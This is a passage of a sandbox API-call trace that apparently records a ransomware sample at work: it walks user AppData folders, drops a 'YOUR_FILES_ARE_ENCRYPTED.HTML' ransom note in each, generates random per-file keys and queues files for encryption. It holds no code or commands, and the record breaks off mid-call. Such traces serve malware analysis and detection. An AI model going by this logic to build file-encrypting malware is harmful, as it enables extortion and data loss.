[0170.317] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.317] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="F6GEI81Z", cAlternateFileName="")) returned 1 [0170.317] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned 65 [0170.317] GetProcessHeap () returned 0x270000 [0170.317] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.317] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" [0170.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*" [0170.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.317] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\desktop.ini") returned 77 [0170.318] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.318] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.318] lstrlenW (lpString=".ini") returned 4 [0170.318] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\fwlink[1]") returned 75 [0170.318] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.318] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.318] lstrlenW (lpString="") returned 0 [0170.318] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.318] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\f6gei81z\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.319] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.321] CloseHandle (hObject=0x604) returned 1 [0170.321] GetProcessHeap () returned 0x270000 [0170.321] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.322] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="GXO2H2PJ", cAlternateFileName="")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned 65 [0170.322] GetProcessHeap () returned 0x270000 [0170.322] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.322] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" [0170.322] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*" [0170.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\desktop.ini") returned 77 [0170.322] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.322] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.322] lstrlenW (lpString=".ini") returned 4 [0170.322] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\fwlink[1]") returned 75 [0170.322] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.322] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.322] lstrlenW (lpString="") returned 0 [0170.322] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.323] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.323] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\gxo2h2pj\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.323] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.325] CloseHandle (hObject=0x604) returned 1 [0170.325] GetProcessHeap () returned 0x270000 [0170.326] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.326] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a520ff0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0170.326] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0170.326] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.326] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0170.326] lstrlenW (lpString=".dat") returned 4 [0170.326] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0170.326] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0170.327] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=32768) returned 1 [0170.327] GetProcessHeap () returned 0x270000 [0170.327] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0170.329] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="14") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="39") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="93") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="F3") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="9C") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="86") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="15") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="A5") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="FE") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="2B") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8B") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A3") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="E5") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="71") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="A0") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="45") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="88") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="21") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="3E") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="96") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="67") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="7C") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="D1") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="26") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="59") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="B2") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="4B") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="FD") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="7F") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="00") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="8F") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="1A") returned 2 [0170.331] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" [0170.331] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.331] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0170.331] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a520ff0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 0 [0170.331] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.331] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0170.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.332] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.334] CloseHandle (hObject=0x5fc) returned 1 [0170.334] GetProcessHeap () returned 0x270000 [0170.335] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.335] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0170.335] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") returned 62 [0170.335] GetProcessHeap () returned 0x270000 [0170.335] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.335] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer" [0170.335] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*" [0170.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.336] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.336] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0170.336] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0170.336] lstrcmpW (lpString1="brndlog.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.336] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0170.336] lstrlenW (lpString=".txt") returned 4 [0170.336] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0170.336] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.338] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12189) returned 1 [0170.338] GetProcessHeap () returned 0x270000 [0170.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0170.341] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="08") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="4E") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="C9") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="DD") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="8C") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="F7") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="17") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B8") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E1") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="6F") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="87") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A7") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="E5") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="B6") returned 2 [0170.341] wsprintfW 